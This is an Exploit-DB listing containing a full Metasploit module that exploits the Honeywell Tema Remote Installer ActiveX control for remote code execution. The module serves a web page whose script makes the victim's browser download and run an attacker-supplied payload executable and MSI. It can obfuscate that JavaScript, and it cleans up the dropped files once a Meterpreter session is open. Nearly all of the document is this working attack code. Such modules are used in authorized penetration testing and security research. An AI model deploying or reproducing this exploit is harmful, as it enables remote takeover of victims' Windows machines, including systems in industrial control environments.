Honeywell Tema Remote Installer - ActiveX Remote Code Execution (Metasploit)

EDB-ID:

24021

CVE:


EDB Verified:

Author:

Metasploit

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2013-01-10

Vulnerable App: 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Honeywell Tema Remote Installer ActiveX Remote Code Execution",
			'Description'    => %q{
					This modules exploits a vulnerability found in the Honewell Tema ActiveX Remote
				Installer.  This ActiveX control can be abused by using the DownloadFromURL()
				function to install an arbitrary MSI from a remote location without checking source
				authenticity or user notification. This module has been tested successfully with
				the Remote Installer ActiveX installed with HoneyWell EBI R410.1 - TEMA 5.3.0 and
				Internet Explorer 6, 7 and 8 on Windows XP SP3.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Billy Rios', # Vulnerability discovery
					'Terry McCorkle', # Vulnerability discovery
					'juan vazquez'  # Metasploit
				],
			'References'     =>
				[
					[ 'OSVDB', '76681' ],
					[ 'BID', '50078' ],
					[ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-11-285-01.pdf' ]
				],
			'Payload'        =>
				{
					'Space'    => 2048,
					'StackAdjustment' => -3500
				},
			'DefaultOptions'  =>
				{
					'EXITFUNC'         => "none",
					'InitialAutoRunScript' => 'migrate -k -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# HoneyWell EBI R410.1 - TEMA 5.3.0
					# Tema_RemoteInstaller.ocx 1.0.0.0
					[ 'Automatic', {} ]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Oct 20 2011",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class)
	end

	def exploit
		@dropped_files = [
			'payload.exe',
			'ThinClient_TemaKit.msi',
			'ThinClient_TemaKit.log'
		]
		super
	end

	def on_new_session(session)
		if session.type == "meterpreter"
			session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
		end

		@dropped_files.each do |file|
			win_file = file.gsub("/", "\\\\")
			if session.type == "meterpreter"
				begin
					wintemp = session.fs.file.expand_path("%WINDIR%")
					win_file = "#{wintemp}\\Temp\\#{win_file}"
					# Meterpreter should do this automatically as part of
					# fs.file.rm().  Until that has been implemented, remove the
					# read-only flag with a command.
					session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
					session.fs.file.rm(win_file)
					print_good("Deleted #{file}")
					true
				rescue ::Rex::Post::Meterpreter::RequestError
					print_error("Failed to delete #{win_file}")
					false
				end

			end
		end

	end

	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']

		# Windows 7 isn't normally supported because the user won't have write access to the
		# %WINDIR%/Temp directory, where the downloaded components are stored.
		if not (agent =~ /MSIE \d/ and agent =~ /NT 5\.1/) and agent !~ /Tema_RemoteInstaller/
			print_error("Browser not supported: #{agent.to_s}")
			send_not_found(cli)
			return
		end

		# exec_payload.msi needs it to be named payload.exe
		# atm there isn't msi generation on the fly
		if request.uri =~ /payload\.exe$/
			return if ((p=regenerate_payload(cli))==nil)
			data = generate_payload_exe({:code=>p.encoded})
			print_status("Sending payload")
			send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
			return
		end

		if request.uri =~ /\.msi$/
			msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
			source = ::File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
			print_status("Sending msi")
			send_response(cli, source, {'Content-Type'=>'application/octet-stream'})
			return
		end

		if agent =~ /MSIE 6/
			# The 'setTimeout' trick allows to execute the installer on IE6 even if the user
			# doesn't click the warning popup when downloading the payload.
			# The ThinClient_TemaKit.msi installer name must be static.
			# <object id="obj" classid="clsid:E01DF79C-BE0C-4999-9B13-B5F7B2306E9B">
			js = <<-EOS
			var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
			setTimeout("obj.DownloadFromURL('#{get_uri}/ThinClient_TemaKit.msi');", 1000);
			obj.DownloadFromURL('#{get_uri}/payload.exe');
			EOS
		else
			js = <<-EOS
			var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
			obj.DownloadFromURL('#{get_uri}/payload.exe');
			obj.DownloadFromURL('#{get_uri}/ThinClient_TemaKit.msi');
			EOS
		end

		js.gsub!(/\t\t\t/, "")

		if datastore['OBFUSCATE']
			js = ::Rex::Exploitation::JSObfu.new(js)
			js.obfuscate
		end

		html = <<-EOS
		<html>
		<body>
		</object>
		<script>
		#{js}
		</script>
		</body>
		</html>
		EOS

		print_status("Sending html")
		send_response(cli, html, {'Content-Type'=>'text/html'})

	end

end
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services